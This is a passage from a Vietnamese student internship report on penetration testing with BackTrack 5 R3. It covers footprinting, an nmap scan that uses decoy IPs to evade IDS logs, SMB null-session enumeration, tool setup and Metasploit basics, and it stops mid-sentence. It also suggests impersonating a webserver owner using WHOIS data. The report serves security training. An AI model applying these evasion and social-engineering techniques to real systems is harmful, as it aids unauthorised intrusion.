SlideShare une entreprise Scribd logo
1  sur  37
Télécharger pour lire hors ligne
ĐẠI HỌC QUỐC GIA THÀNH PHỐ HỒ CHÍ MINH
TRƯỜNG ĐẠI HỌC BÁCH KHOA
KHOA KHOA HỌC & KỸ THUẬT MÁY TÍNH
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ
MẠNG & AN NINH MẠNG QUỐC TẾ
ATHENA
BÁO CÁO ĐỀ TÀI THỰC TẬP CNTT
Đề tài: Nghiên cứu và sử dụng các chức năng của backtrack để kiểm tra an ninh mạng
GVHD: Thầy VÕ ĐỖ THẮNG
Sinh viên thực hiện:
Phạm Minh Đạt – 51100753
Dương Thế Hiển - 51101153
Thành phố Hồ Chí Minh, ngày 11 tháng 08 năm 2014
TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA
Chương trình thực tập công nghiệp 2 Trang 1
NỘI DUNG BÀI BÁO CÁO
LỜI CAM ĐOAN....................................................................................................................................................................................................................................2
LỜI CẢM ƠN TRUNG TÂM..............................................................................................................................................................................................................3
LỜI CẢM ƠN KHOA............................................................................................................................................................................................................................4
LỜI MỞ ĐẦU.........................................................................................................................................................................................................................................5
NHẬN XÉT CỦA CÔNG TY THỰC TẬP .......................................................................................................................................................................................6
NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN...............................................................................................................................................................................7
GIỚI THIÊU VỀ CÔNG TY THỰC TẬP.........................................................................................................................................................................................8
Các cơ sở ............................................................................................................................................................................................................................................8
Cơ sở 1: Tại TP Hồ Chí Minh:................................................................................................................................................................................................8
Cơ sở 2: Tại TP Hồ Chí Minh:................................................................................................................................................................................................8
Lĩnh vực hoạt động........................................................................................................................................................................................................................8
Đội ngũ giảng viên .........................................................................................................................................................................................................................9
NỘI DUNG CHÍNH CỦA CHƯƠNG TRÌNH THỰC TẬP ......................................................................................................................................................10
Footprinting ...................................................................................................................................................................................................................................10
Cở sở lý thuyết ..........................................................................................................................................................................................................................10
Cách thực hiện...........................................................................................................................................................................................................................10
Network Scanning .......................................................................................................................................................................................................................12
Cơ sở lý thuyết ..........................................................................................................................................................................................................................12
Cách thực hiện...........................................................................................................................................................................................................................13
Enumeration ..................................................................................................................................................................................................................................13
Cơ sở lý thuyết ..........................................................................................................................................................................................................................13
Cách thực hiện...........................................................................................................................................................................................................................13
Giới thiệu VMWare Workstation...........................................................................................................................................................................................15
Hệ điều hành BackTrack5 R3 .................................................................................................................................................................................................15
Giới thiệu Backtrack5 R3......................................................................................................................................................................................................15
Cài đặt Backtrack5 R3 trên VMWare ..............................................................................................................................................................................16
Công cụ Metasploit......................................................................................................................................................................................................................22
Giới thiệu Metasploit..............................................................................................................................................................................................................22
Các thành phần của Metasploit..........................................................................................................................................................................................22
Sử dụng Metasploit framework.........................................................................................................................................................................................22
Payload meterpreter..............................................................................................................................................................................................................23
Tiến hành khai thác các lỗ hổng trên Windows XP qua localhost..........................................................................................................................24
Khai thác lỗi MS10-090: lỗi của MSHTML trong trình duyệt IE6, IE7..............................................................................................................24
Khai thác lỗi MS12_027: lổ hổng MS-Office 2007, 2010.........................................................................................................................................28
Khai thác lỗi của Adobe Reader.........................................................................................................................................................................................29
Khai thác mã lỗi MS08_067: lỗ hổng của hệ điều hành Windows XP...............................................................................................................32
Tấn công qua mạng Internet, triển khai trên VPS .........................................................................................................................................................34
VPS là gì........................................................................................................................................................................................................................................34
Đặc điểm VPS.............................................................................................................................................................................................................................34
Giá trị sử dụng của VPS .........................................................................................................................................................................................................34
Khai thác thông qua VPS.......................................................................................................................................................................................................34
KẾT QUẢ ĐẠT ĐƯỢC SAU QUÁ TRÌNH THỰC TẬP...........................................................................................................................................................35
TÀI LIỆU THAM KHẢO...................................................................................................................................................................................................................36
GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng
Trang 2 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển
LỜI CAM ĐOAN
Tôi xin cam đoan:
 Những nội dung trong bài báo cáo này là do tôi thực hiện dưới sự hướng dẫn của thầy Võ Đỗ Thắng.
 Mọi tham khảo trong báo cáo này đều được trích dẫn rõ ràng tác giả, tên công trình, thời gian, địa điểm công
bố.
 Mọi sao chép không hợp lệ, vi phạm qui chế đào tạo, hay gian lận nhóm xin hoàn toàn chịu trách nhiệm.
Các bài báo cáo hàng tuần và các video clip:
Dương Thế Hiển – 51101153
 Tuần 1:
http://www.slideshare.net/duongthehien1109/duong-the-hien-hbkttcn2-bo-co-tun-1
https://www.youtube.com/watch?v=yPISuQIlOpM
 Tuần 2:
http://www.slideshare.net/duongthehien1109/duong-the-hien-hbkttcn2-bo-co-tun-2
https://www.youtube.com/watch?v=_7GrYn_zqtI&feature=youtu.be
 Tuần 3:
http://www.slideshare.net/duongthehien1109/duong-the-hien-hbkttcn2-bo-co-tun-3
https://www.youtube.com/watch?v=gJdtkKWmTuc
 Clip giới thiệu cá nhân
https://www.youtube.com/watch?v=R02WiuE_tEI&feature=youtu.be
Phạm Minh Đạt – 51100753
 Clip giới thiệu và các bài báo cáo
http://tinyurl.com/baocaoathena
Video clip cuối kỳ
https://www.youtube.com/watch?v=eMblYurER_Q
TPHCM ngày 11 tháng 08 năm 2014
Nhóm sinh viên thực hiện
Phạm Minh Đạt
Dương Thế Hiển
TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA
Chương trình thực tập công nghiệp 2 Trang 3
LỜI CẢM ƠN TRUNG TÂM
Tôi xin cảm ơn giám đốc Trung tâm đào tạo quản trị và an ninh mạng Athena, cùng các anh chị trong công ty.
Đặc biệt, tôi xin chân thành cảm ơn thầy Võ Đỗ Thắng đã nhiệt tình giúp đỡ và hướng dẫn tôi trong suốt thời gian
TTCN2. Đã tạo điều kiện cũng như kiến thức trong suốt thời thời gian thực tập, đóng góp những ý kiến quý báu để
hoàn thành tốt bài báo cáo.
Mặc dù tôi và nhóm đã cố gắng hoàn thành báo cáo thực tập tốt nghiệp với tất cả nỗ lực của bản thân. Nhưng
chắc chắn sẽ vần còn sai sót. Nhóm rất mong được sự đóng góp, chia sẻ để nhóm có thể làm tốt hơn nữa trong các kỳ
thực tập sắp tới.
Một lần nữa tôi xin chân thành cảm ơn.
TPHCM ngày 11 tháng 08 năm 2014
Nhóm sinh viên thực hiện
Phạm Minh Đạt
Dương Thế Hiển
GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng
Trang 4 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển
LỜI CẢM ƠN KHOA
Tôi xin chân thành cảm ơn trường Đại Học Bách Khoa tp.HCM và khoa Khoa Học và Kỹ Thuật Máy Tính đã tạo
điều kiện cho tôi hoàn thành tốt đợt TTCN 2 này. Trong đợt thực tập này đã cho tôi những kinh nghiệm quý báu.
Những kinh nghiệm này sẽ giúp tôi hoàn thiện hơn trong công việc và môi trường làm việc sau này.
Mặc dù tôi và nhóm đã cố gắng hoàn thành báo cáo thực tập tốt nghiệp với tất cả nỗ lực của bản thân. Nhưng
chắc chắn sẽ vần còn sai sót. Nhóm rất mong được sự đóng góp, chia sẻ để nhóm có thể làm tốt hơn nữa trong các kỳ
thực tập sắp tới.
Một lần nữa tôi xin chân thành cảm ơn.
TPHCM ngày 11 tháng 08 năm 2014
Nhóm sinh viên thực hiện
Phạm Minh Đạt
Dương Thế Hiển
TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA
Chương trình thực tập công nghiệp 2 Trang 5
LỜI MỞ ĐẦU
Theo xu hướng phát triển như hiện nay, máy tính cũng như thiết bị thông minh phát triển ngày càng mạnh trên
nền hệ thống mạng Internet. Thế nên, vấn đề bảo mật thông tin, an ninh mạng càng được chú trọng nhiều hơn. Hiện
nay, các giao dịch ngân hàng, mua bán qua mạng được thực hiện hàng ngày, hàng giờ thông qua Internet, và các tài
khoản ngân hàng là mục tiêu được các tin tặc nhắm đến. Tuy nhiên, vẫn ít có cá nhân hoặc doanh nghiệp nào chủ
động phòng tránh việc này.
Đó là lý do nhóm quyết định tham gia nghiên cứu đề tài này – “Nghiên cứu và sử dụng các công cụ của
BackTrack để nghiên cứu an ninh mạng” – để có thể chủ động phòng tránh những khai thác đến từ tin tặc và có thể
giúp đỡ người khác, các doanh nghiệp chủ động phòng tránh trước các nguy cơ mất mác do tin tặc gây ra.
TPHCM ngày 11 tháng 08 năm 2014
Nhóm sinh viên thực hiện
Phạm Minh Đạt
Dương Thế Hiển
GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng
Trang 6 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển
NHẬN XÉT CỦA CÔNG TY THỰC TẬP
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
TPHCM, ngày …. tháng … năm 20..
Giám đốc trung tâm
TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA
Chương trình thực tập công nghiệp 2 Trang 7
NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
TPHCM ngày …. tháng …… năm 20…
Giáo viên hướng dẫn
GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng
Trang 8 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển
GIỚI THIÊU VỀ CÔNG TY THỰC TẬPi
Các cơ sở
Cơ sở 1: Tại TP Hồ Chí Minh:
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA. Số 2 Bis Đinh Tiên Hoàng, Phường Đa
Kao, Tp Hồ Chí Minh, Việt Nam.
Điện thoại: ( 84-8 ) 3824 4041
Hotline: 0943 23 00 99
Cơ sở 2: Tại TP Hồ Chí Minh:
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA 92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận
1, Tp Hồ Chí Minh, Việt Nam.
Website : www.athena.edu.vn or www.athena.com.vn
Điện thoại: ( 84-8 ) 2210 3801
Hotline: 0943 20 00 88
Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA được thành lập từ năm 2004, là một tổ
chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm
huyết góp phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế mũi nhọn, góp phần phát
triển nước nhà.
Lĩnh vực hoạt động
 Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an ninh mạng,
thương mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI,
CEH,... Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng
của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính…
 Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm nhận công tác
quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ
Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,…
 Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công nghệ với
nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học
TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA
Chương trình thực tập công nghiệp 2 Trang 9
Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự,…
Đội ngũ giảng viên
 Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học hàng đầu trong nước .... Tất
cả giảng viên ATHENA đều phải có các chứng chỉ quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH, có bằng sư
phạm Quốc tế (Microsoft Certified Trainer).Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều kiện tham gia
giảng dạy tại trung tâm ATHENA.
 Bên cạnh đó, các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến thức công nghệ mới từ các nước
tiên tiến như Mỹ , Pháp, Hà Lan, Singapore,... và truyền đạt các công nghệ mới này trong các chương trình đào tạo tại
trung tâm ATHENA.
GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng
Trang 10 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển
NỘI DUNG CHÍNH CỦA CHƯƠNG TRÌNH THỰC TẬP
PHẦN I: THU THẬP THÔNG TINii
Footprinting
Cở sở lý thuyết
Footprinting là một trong 3 quá trình đầu tiên mà hacker sẽ tiến hành nhằm thu thập thông tin về mục tiêu nhằm xác
định:
 Hệ thống mạng của mục tiêu: Internet, Localnetwork, Wireless, …
 Host: IP, OS, …
 Owner: chủ sở hữu, location, nhân viên, …
Trong quá trình này hacker chủ yếu sử dụng các phương tiện thông tin công cộng như báo chí, internet để tìm hiểu
các thông tin hợp pháp về mục tiêu.
Footprinting hầu như không thể phát hiện vì đây là hành động hợp pháp.
 Passive Footprinting:
o Google Search
o Browse Company Website
o Whois lookup
o Nslookup/Tracert command line
 Active Footprinting:
o Physical contact
o Email contact
Cách thực hiện
1. Lấy thông tin cá nhân của người đăng ký webserver tại trang web http://centralops.net/co/
Lấy được các thông tin cá nhân này ta có thể tiến hành các hoạt động mạo danh, lừa đảo chủ webserver để phục vụ
cho việc tấn công webserver.
TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA
Chương trình thực tập công nghiệp 2 Trang 11
2. Tìm các subdomain hoặc các domain được host tại webserver này để có thể tấn công thông qua các victim
này thay vì tấn công trực tiếp. Tiến hành tại website http://www.yougetsignal.com/tools/web-sites-on-
web-server/
GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng
Trang 12 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển
3. Xác định vị trí của webserver thông qua Google Maps để có thể tiếp cận gần hơn về mặt physical.
Nếu như tại hệ thống mạng này có dùng access point ta có thể tấn công vào hệ thống nhờ access point này. Để biết
được thông tin về Access Point lận cận như: kiểu mã hóa, MAC Address, … ta có thể dùng lệnh sau tại command
promt
netsh wlan show networks mode=bssid
 BSSID chính là MAC Address của Access Point. Từ MAC Address ta có thể biết được Model của AP, default
password, mức độ bảo mật, …
 Authentication: ta có thể áp dụng nhiều biện pháp khác để tiến hành crack password AP này.
Network Scanning
Cơ sở lý thuyết
Network Scanning là quá trình tìm hiểu thông tin về các live host trên mạng để giúp hacker quyết định kiểu tấn công
nào sẽ được dùng dể tấn công vào hệ thống. Trong quá trình tấn công, hacker sẽ tìm hiểu các thông tin về
 Host: nếu ping mục tiêu và nhận được echo reply tức là host chắc chắn tồn tại. Nếu port 139, 445 được mở thì
host đang dùng OS Windows Family từ 2000 trở lên.
 Network: scan mạng tìm ra các live host làm mục tiêu attack hoặc các NIC hoạt động trong promiscuous mode
để nhận diện các hệ thống IDS, hotneypot, …
 Vulnerability Scan: tìm ra các lỗi của OS, Services mà host đang sử dụng.
Điều kiện scanning: có khả năng kết nối tới mục tiêu
Hacker sẽ gửi các gói tin đến mục tiêu và dựa vào các gói tin trả về để phân tích tìm thông tin.
TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA
Chương trình thực tập công nghiệp 2 Trang 13
Cách thực hiện
Sử dụng công cụ NMAP (http://nmap.org/) để scan cái port, OS và services trên một host
Dùng lệnh nmap –sS –O –p 1-445 –D 192.168.222.121 192.168.222.129
Trong đó:
o -sS: syn scan
o -O: OS detection
o -p: scan từ port a-b
o -D: giả them IP để tránh log của IDS System
Enumeration
Cơ sở lý thuyết
Enumneration là bước tiếp theo kế tiếp Scanning để xác định các thông tin về host để chuẩn bị cho các bước tiếp
theo, Enumeration sẽ thu thập các thông tin về:
 Services Port: tìm các port đang mở cho dịch vụ nào
 OS: xác định chính xác hệ điều hành nào.
 User/Group xác định các thông tin về username, password,…
Nền tảng của quá trình này là sử dụng dịch vụ CIFS/Server Message Bkock (SMB) là dịch vụ khởi thủy từ IBM và
được phát triển bởi Microsoft. Dịch vụ này nhằm mục đích chia sẻ data trên mạng ngang hang giúp cho các client
trong mạng có thể dễ dàng tiếp cận data đã được chia sẻ. Dịch vụ này sử dụng SMB protocol hoạt động ở tầng
Application trong mô hình OSI. Từ Windows Vista, Microsoft đã chuyển sang dùng SMB 2.0.
Trong quá trình trao đổi SMB theo kiểu client/server sẽ diễn ra quá trình Authentication và xác định các share
resource. Mặc định Windows chấp nhận các user anonymouse trong quá trình authentication này để client có thể dễ
dàng tìm ra các share source. Connection được tạo ra bữa user anonymouse được gọi là Null Connection.
Enumeration sẽ lấy được thông tin vì có thể tạo được Null Connection với mục tiêu.
Từ Windows XP, 2003 mặc định user anonymous không nằm trong group everyone
Cách thực hiện
GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng
Trang 14 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển
1. Tạo null connection với mục tiêu
2. Tìm username của bằng SID2USER
Thông tin ta thu về được sau bước này chính là SID của account. Chính con số này sẽ cho ta biết rất nhiều thứ. Dựa
vào bảng SID iii để hiểu thông tin mà SID cung cấp.
Nhìn vào kết quả thu được bên trên ta nhận thấy rằng cái SID đều
giống nhau chỉ khác phần RID, phần số cuối cùng. Và dựa vào bảng này
ta có thể tìm được tên của tài khoản Administrator của máy tính.
3. Tìm username của Administrator của máy qua SID2USER
Default Global groups (SidTypeGroup)
Domain Admins S-1-5-21-<number>-<number>-<number>-512
Domain Users S-1-5-21-<number>-<number>-<number>-513
Domain Guest S-1-5-21-<number>-<number>-<number>-514
Non-Default Global Groups (SidTypeAlias)
Example S-1-5-21-<number>-<number>-<number>-n=> 1000
Non-Default Local Groups (SidTypeAlias)
Example S-1-5-21-<number>-<number>-<number>-n=> 1000
Default Accounts (SidTypeUser)
Administrator S-1-5-21-<number>-<number>-<number>-500
Guest S-1-5-21-<number>-<number>-<number>-501
Non-Default User Accounts (SidTypeUser)
jsmith S-1-5-21-<number>-<number>-<number>-n=> 1000
Figure 1: Bảng SID
TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA
Chương trình thực tập công nghiệp 2 Trang 15
PHẦN II: SYSTEM HACKING
Giới thiệu VMWare Workstation
VMWare Workstation là một hyperviser( ảo hóa phần cứng ) chạy trên các máy tính, cho phép người dùng thiết
lập một hay nhiều máy ảo trên một máy vật lý và cho phép sử dụng đồng thời với máy thực. Mỗi máy ảo có thể thực
thi hệ điều hành của riêng mình, bao gồm các phiên bản Microsoft Windows, Linux, BSD, và MS-DOS. VMWare
Workstation được phát triển bởi VMWare, Inc.
VMWare Workstation hỗ trợ cầu nối adapter mạng tại máy chủ vật lý và chia sẻ các ỗ đĩa và các thiết bị USB với
các máy ảo. Ngoài ra, nó có thể mô phỏng ỗ đĩa. Nó có thể gắn kết một tập tin ảnh ISO vào một ổ đĩa quang ảo để máy
ảo thấy nó như là ỗ đĩa thực. Tương tự, ỗ đĩa cứng ảo được thực hiện thông qua các tập tin .vmdk .
VMWare Workstation có thể lưu trạng thái của một máy ảo bất cứ lúc nào ngay lập tức. Những trạng thái này
có thể được dùng để phục hồi đưa máy ảo về trạng thái đã lưu trước đó.
VMWare Workstation có khả năng chỉ nhiều máy ảo chạy trên nó như là tắt, tạm dừng hoặc tiếp tục, tạo điều
kiện thích hợp để thử nghiệm môi trường client-server.
Hệ điều hành BackTrack5 R3
Giới thiệu Backtrack5 R3
Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm thâm nhập. Trong
dạng Live DVD có thể sử dụng trực tiếp từ DVD hoặc có thể cài đặt trên máy và sử dụng như một hệ điều hành.
Backtrack hỗ trợ một cách nhanh chóng cho việc tìm kiếm và cập nhật các cơ sở dữ liệu các công cụ bảo mật.
Backtrack có lịch sử phát triển qua nhiều phiên bản Linux khác nhau, phiên bản hiện nay đang sử dụng bảng phân
phối Slackware Linux và liên tục cập nhật các công cụ, driver qua các phiên bản…Công cụ kiểm thử trong bảo mật có
thể được phân loại thành các nhóm như sau:
 Information gathering : loại này chứa một số công cụ có thể được sử dụng để có được thông tin liên quan đến
mục tiêu DNS, định tuyến, địa chỉ e-mail, trang web, máy chủ e-mail. Thông tin này được thu thập từ các thông tin có
sẵn trên Internet mà không cần chạm vào mục tiêu.
 Network mapping : loại này chứa các công cụ có thể được sử dụng để kiểm tra các host đang tồn tại, thông tin
về OS, ứng dụng được sử dụng bởi mục tiêu, và cũng làm portscanning.
 Vulnerability identification : Trong thể loại này bạn có thể tìm thấy các công cụ quét lỗ hổng tổng hợp và trong
các thiết bị Cisco. Nó cũng chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) và Simple
Network Management Protocol (SNMP).
 Web application analysis : loại này chứa công cụ có thể được sử dụng để theo dõi, giám sát các hoạt động web.
 Radio network analysis : Để kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến (RFID), bạn có
thể sử dụng các công cụ trong thể loại này.
 Penetration : loại này chứa công cụ có thể được sử dụng để khai thác các lỗ hổng tìm thấy trong các máy tính
mục tiêu.
 Privilege escalation : Sau khi khai thác được các lỗ hổng và truy cập vào được các máy tính mục tiêu, bạn có thể
sử dụng các công cụ loại này để nâng cao đặc quyền của bạn cho các đặc quyền cao nhất.
 Maintaining access : Công cụ loại này sẽ có thể sẽ giúp bạn trong việc duy trì quyền truy cập vào các máy tính
mục tiêu. Bạn có thể cần những đặc quyền cao nhất trước khi bạn có thể cài đặt công cụ để duy trì quyền truy cập.
 Voice Over IP (VOIP) : Các công cụ để phân tích VOIP.
 Digital forensics : Phân tích hình ảnh đĩa cứng cấu trúc các tập tin có thể chọn Start Backtrack Forensics trong
trình đơn khởi động.
 Reverse engineering : Gỡ rối chương trình hoặc tháo rời các tập tin thực thi.
GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng
Trang 16 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển
Cài đặt Backtrack5 R3 trên VMWare
Tại giao diện chính của VMWare Workstation chọn File -> New Virtual Machine
Ta chọn Next để qua bước kế tiếp
Tiếp theo ta sẽ chọn phiên bản của hệ điều hành và đặt tên cho máy Backtrack. Ở đây tôi đặt tên máy là Backtrack5
R3
TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA
Chương trình thực tập công nghiệp 2 Trang 17
Nhấn Next để qua bước kế tiếp, trong phần disk size ta sẽ chọn 20 GB.
Tiếp theo ta chọn Next -> Finish.
GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng
Trang 18 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển
Đầu tiên ta sẽ dẫn file .ISO cài đặt Backtrack5 R3
Tiếp theo ta bấm Power on this virtual machine để khởi động quá trình cài đặt. Và đợi quá trình cài đặt hoàn tất.
Để vào Desktop của Backtrack ta dùng lệnh : startx
TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA
Chương trình thực tập công nghiệp 2 Trang 19
Để hoàn tất cài đặt Backtrack5 R3 ta nhấn : Install BackTrack trên màn hình Desktop
Tiếp theo ta sẽ thiết lập một số options để quá trình cài đặt được bắt đầu.
GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng
Trang 20 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển
TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA
Chương trình thực tập công nghiệp 2 Trang 21
Quá trình cài đặt sẽ mất một khoảng thời gian.
Đến đây thì quá trình cài đặt đã kết thúc, chúng ta bấm Restart Now để khởi động lại máy.
Chúng ta đăng nhập với tên là root, password là toor. Gõ startx để vào Desktop của Backtrack.
GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng
Trang 22 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển
Công cụ Metasploit
Giới thiệu Metasploit
Metasploit Framework là môi trường dùng để kiểm tra, tấn công và khai thác lỗi của các service. Metasploit được xây
dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler và Python. Metasploit
có thể chạy trên hầu hết các hệ điều hành Windows, Linux, MacOS.
Các thành phần của Metasploit
 Cosole interface : dùng msfconsole.bat . Msfconsole interface sử dụng được các dòng lệnh cấu hình, kiểm tra
nên nhanh hơn và mềm dẻo hơn.
 Web interface : dùng msfweb.bat giao tiếp với người dùng thông qua giao diện web.
 Command line interface : dùng msfcli.bat .
 Môi trường :
 Global Enviroment : được thực thi thông qua 2 câu lệnh setg và unsetg, những options này được gán ở
đây sẽ mang tính toàn cục, được đưa tất cả vào trong module exploits.
 Temporary Enviroment : được thực thi thông qua 2 câu lệnh set và unset, enviroment này chỉ được đưa
vào module exploits hiện tại và không ảnh hưởng đến các modul exploits khác.
 Chúng ta có thể lưu lại enviroment đã cấu hình thông qua lệnh save. Môi trường đó sẽ được lưu lại trong
/.msfconfig và sẽ được load trở lại khi user interface được thực hiện.
 Những options nào chung giữa giư các exploits module : LPORT, LHOST, PAYLOAD thì chúng ta sẽ xác
định ở Global Enviroment.
Sử dụng Metasploit framework
1. Chọn module exploit : lựa chọn chương trình, lỗi mà Metasploit có hỗ trợ để khai thác.
 Show exploits : xem các module mà exploit mà framework hỗ trợ.
 Use exploit_name : chọn exploit name.
 Info exploit_name : xem thông tin về module exploit.
2. Cấu hình module exploit đã chọn.
 Show options : xác định những options nòa cần cấu hình.
 Set : cấu hình cho những options của những module đó.
3. Verify những options vừa cấu hình.
 Check : kiểm tra những options đã được cấu hình chính xác chưa.
TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA
Chương trình thực tập công nghiệp 2 Trang 23
4. Lựa chọn target : lựa chọn hệ điều hành nào để tiến hành.
 Show target : những target được cung cấp bởi module đó.
 Set : xác định target nào.
5. Lựa chọn payload
 Payload là đoạn mã code sẽ chạy trên hệ thống remote machine.
 Show payloads : liệt kê ra những payload của module exploit hiện tại.
 Info payload_name : xem thông tin chi tiết về payload đó.
 Set payload payload_name : xác định tên của payload module. Sau khi chọn payload nào ta dùng lệnh show
options để xem options của payload đó.
 Show advanced : xem những advanced options của payload.
6. Thực thi exploit
 Exploit : lệnh dùng để thực thi payload code. Payload sau đó sẽ cung cấp cho bạn những thông tin cần thiết.
Payload meterpreter
Meterpreter là viết tắt của meta-Interpreter là một advanced payload có trong Metasploit framework. Mục đích
của nó là để cung cấp những tập lệnh để khai thác tấn công các remote computer. Nó được viết từ các developer dưới
